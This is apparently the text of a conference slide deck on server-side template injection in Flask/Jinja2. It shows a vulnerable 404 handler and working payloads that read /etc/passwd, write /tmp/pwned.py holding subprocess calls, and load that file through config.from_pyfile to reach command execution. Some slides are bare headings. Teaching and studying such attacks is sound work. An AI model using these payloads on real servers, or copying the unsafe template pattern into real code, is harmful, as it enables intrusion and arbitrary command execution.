From SSTI to command execution using flask native features

2. Why SSTI
What is de/serialization
Why is it important
SSTI live example

3. Idea

4. Types
BINARY
Java, Ruby
READABLE
YAML, XML, JSON
HYBRID
Python, PHP, Binary XML/JSON

5. Where it is
Communicating data to different systems, process
Wire protocols, web services
Storing and re-using data
Databases, cache servers, file systems
Tokens
HTTP cookies, HTML form parameters, API auth tokens

6. 2015 - java deserialization apocalypse

7. Are other languages safe?

9. Server-Side Template Injection
http://address/injectedData Server Template
<h1>aaa</h1>
<h1>aaa</h1>
<h1>aaa</h1>

10. Server-Side Template Injection
http://address/injectedData Server Template
{{5*5}}
25
{{5*5}}

11. Problem
@app.errorhandler(404)
def page_not_found(e):
template = '''{%% extends "layout.html"
%%}
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't
exist.</h1>
<h3>%s</h3>
</div>
{%% endblock %%}
''' % (request.url)
return render_template_string(template),
404
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>aaa{{5*5}}</h3>
</div>
{%% endblock %%}
No validation
Template Engine Instruction

12. How it works
type
class
object
subclass
type
params

13. string - class instance
{{‘ ‘.__class__ .__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}{{‘ ‘.__class__
python internal method which allows to
work with class instance like class object

14. {{‘ ‘.__class__ .__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}.__mro__[2]
Method resolution order - returns
inharitance chain for a class object
<type 'str'>, <type 'basestring'>, <type 'object'>
.__subclasses__()
Returns list of all sublclasses of the selected class

15. {{‘ ‘.__class__ .__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}.__subclasses__()
Returns list of all sublclasses of the selected class
[40]('/etc/passwd').read()}}

16. {{‘ ‘.__class__ .__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

17. BONUS - Flask&Jninja2 = SHELL

18. Using flask native features
● Config - Flask template global that represents “The current
configuration object (flask.config)
● Contains all of the configuration values AFTER they
have been resolved by the framework.
● Configuration variables can be ADDED to a config object

19. Initial state of config file

20. Create payload
{{''.__class__.__mro__[2].__subclasses__()[40]('/tmp
/pwned.py', 'w').write('from subprocess import
check_outputnnRUNCMD = check_outputn')}}

21. Create payload

22. Using Flask magic

23. {{config.from_pyfile('/tmp/pwned.py')}}

24. RCE

25. Limitations
Can work only with class instances, not class objects
Does not show python errors
Only modules that are installed can be used

26. Thank you!
Thanks https://explodingkittens.com/ for good mood and design ideas!